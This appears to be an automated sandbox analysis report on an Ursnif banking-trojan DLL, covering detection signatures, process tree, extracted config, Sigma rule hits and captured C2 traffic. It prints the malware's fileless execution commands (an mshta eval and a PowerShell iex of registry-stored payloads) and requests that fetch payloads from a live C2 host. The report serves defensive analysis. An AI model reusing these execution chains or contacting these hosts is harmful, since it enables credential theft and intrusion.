Loading ...

Play interactive tourEdit tour

Analysis Report vnaSKDMnLG

Overview

General Information

Sample Name:vnaSKDMnLG (renamed file extension from none to dll)
Analysis ID:322748
MD5:c9d954b3f1c512e6804fd8f5637b58b6
SHA1:b452040d8072117ddbe1adf9e1eab5e4bdb150bd
SHA256:d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
Tags:dllgozitr01ursnif

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5560 cmdline: loaddll32.exe 'C:\Users\user\Desktop\vnaSKDMnLG.dll' MD5: 76E2251D0E9772B9DA90208AD741A205)
    • regsvr32.exe (PID: 4360 cmdline: regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 6968 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 7012 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 4288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 4472 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 5804 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 4356 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4636 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6868 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 7108 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6224 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5836 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6484 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1808 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6724 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6688 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4724 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@536720hh", "dns": "536720", "version": "250166", "uptime": "167", "crc": "2", "id": "3050", "user": "0291816208f8d2d8cdc8873ad856765a", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 17 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4760, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', ProcessId: 1808
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6484, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 4760
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4760, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline', ProcessId: 1808
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6968, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 7012

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: vnaSKDMnLG.dllAvira: detected
            Found malware configurationShow sources
            Source: regsvr32.exe.4360.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@536720hh", "dns": "536720", "version": "250166", "uptime": "167", "crc": "2", "id": "3050", "user": "0291816208f8d2d8cdc8873ad856765a", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: vnaSKDMnLG.dllVirustotal: Detection: 11%Perma Link
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: Joe Sandbox ViewIP Address: 87.248.118.23 87.248.118.23
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: unknownTCP traffic detected without corresponding DNS query: 63.250.47.200
            Source: global trafficHTTP traffic detected: GET /images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
            Source: global trafficHTTP traffic detected: GET /images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKvCH/VXQwRoWXG5R/k9cBAONcCOy6zC/schMO1Bz6Hv1XAWY_2Bj1/Epe_2FrlHpFxpDqb/wkcRD0A5Nn7ZtOM/LcznbG_2FsTdDMEgaN/jIHJPS5D0/Fp7e0qKKctEIDJT6MGkX/RCGhIjX0.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
            Source: global trafficHTTP traffic detected: GET /images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemWY/lVp7AN_2F/YEmcQ_2BEaBJyDUMlsGk/jN8oDN7xGQMygxh4f9g/_2FyagJjAZDLRvoreYuui8/LRxePg_2BGB0U/MpT06eFx/VfNkohToJFJcoGZ4_2Bgo5f/Opt0pN_2FL/JG_2FCiZ4ufIuI3kc/AT1ZiYCskKpp/v3TP_2FuS2b/9i.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
            Source: global trafficHTTP traffic detected: GET /grab32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /grab64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmpString found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmpString found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365F equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmpString found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365\ equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmpString found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365}X equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
